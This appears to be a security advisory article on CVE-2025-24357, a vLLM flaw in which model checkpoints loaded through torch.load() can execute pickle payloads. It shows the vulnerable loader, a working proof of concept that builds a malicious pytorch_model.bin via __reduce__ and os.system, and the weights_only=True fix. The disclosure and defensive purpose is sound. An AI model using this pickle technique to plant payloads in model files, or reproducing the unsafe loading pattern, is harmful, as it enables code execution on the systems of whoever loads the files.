vLLM is a popular open-source library for Large Language Model (LLM) inference and serving. It is the backbone of numerous applications and services that rely on natural language processing and machine learning. Unfortunately, a recently disclosed vulnerability, assigned the identifier CVE-2025-24357, allows arbitrary code execution during model loading, with potentially severe security consequences. This article explores the details of the vulnerability, how it can be exploited, and how to mitigate the risk.
Details
The vulnerability lives in a module within the vLLM library: vllm/model_executor/weight_utils.py. This module provides the hf_model_weights_iterator() function, which loads model checkpoints downloaded from the Hugging Face Hub. To read these checkpoints, the function relies on PyTorch's torch.load(), whose weights_only parameter defaults to False.
The vulnerability arises because torch.load() is invoked on untrusted files without any restriction on the pickle payload. When a checkpoint file contains maliciously crafted pickle data, arbitrary code embedded in that data is executed during the unpickling process, compromising the system running the vLLM library.
A simplified sketch of the vulnerable loading pattern in vllm/model_executor/weight_utils.py is shown below (illustrative, not the exact upstream source):
import glob
import torch

def hf_model_weights_iterator(checkpoint_dir):
    # Iterate over every PyTorch checkpoint shard in the directory.
    for bin_file in sorted(glob.glob(f"{checkpoint_dir}/*.bin")):
        # VULNERABLE: torch.load() defaults to weights_only=False, so
        # unpickling attacker-controlled data can execute arbitrary code.
        state_dict = torch.load(bin_file, map_location="cpu")
        for name, param in state_dict.items():
            yield name, param
Exploit Details
An attacker can exploit this vulnerability by crafting a malicious checkpoint whose pickle data, when unpickled, executes arbitrary code on the target system. After uploading the malicious checkpoint to an accessible location such as the Hugging Face Hub, the attacker only needs to trick a developer or service into loading it via vLLM, at which point the embedded code runs with the privileges of the vLLM process.
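A minimal proof-of-concept sketch is shown below (the file name and the deliberately harmless payload are illustrative assumptions, not taken from the advisory). Python's pickle protocol invokes an object's __reduce__() method to decide how to reconstruct it, so any callable returned from __reduce__() runs during unpickling:

import os
import torch

class MaliciousPayload:
    # pickle stores the (callable, args) pair returned here; the callable
    # is invoked on the victim's machine during unpickling.
    def __reduce__(self):
        return (os.system, ("echo 'arbitrary code executed' > /tmp/pwned",))

# Hide the payload alongside ordinary-looking tensor data.
checkpoint = {
    "weight": torch.zeros(1),
    "payload": MaliciousPayload(),
}
torch.save(checkpoint, "pytorch_model.bin")

# Victim side: torch.load("pytorch_model.bin") with the default
# weights_only=False runs os.system(...) before returning any weights.

Loading this file with the vulnerable iterator sketched earlier is enough to create /tmp/pwned; no model code ever has to run.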
Mitigation
The vulnerability has been fixed in vLLM version 0.7.0. Users are strongly encouraged to upgrade their vLLM installations to this version or later to safeguard against the exploit. The patch passes weights_only=True to torch.load(), which uses a restricted unpickler that only reconstructs tensors and other allow-listed types, so arbitrary pickle payloads are rejected instead of executed.
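Applied to the hypothetical iterator sketched earlier, the safe loading pattern looks like this:

import glob
import torch

def hf_model_weights_iterator(checkpoint_dir):
    for bin_file in sorted(glob.glob(f"{checkpoint_dir}/*.bin")):
        # weights_only=True switches torch.load() to a restricted unpickler
        # that raises UnpicklingError on anything that is not a tensor or
        # an allow-listed container type.
        state_dict = torch.load(bin_file, map_location="cpu",
                                weights_only=True)
        for name, param in state_dict.items():
            yield name, param

With this change, the proof-of-concept checkpoint above fails to load instead of executing its payload.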
Link to the vLLM v0.7.0 release
- https://github.com/vllm-project/vllm/releases/tag/v0.7.0
Link to the original security advisory
- https://github.com/vllm-project/vllm/security/advisories/GHSA-rh4j-5rhw-hr54
Conclusion
In summary, CVE-2025-24357 is a serious vulnerability in the vLLM library that enables arbitrary code execution via malicious pickle data in model checkpoints. Users of vLLM should upgrade their installations to version 0.7.0 or later to fully protect against this exploit. Regularly assessing and upgrading your software and dependencies is a crucial step in maintaining the security and integrity of your systems.
Timeline
Published on: 01/27/2025 18:15:41 UTC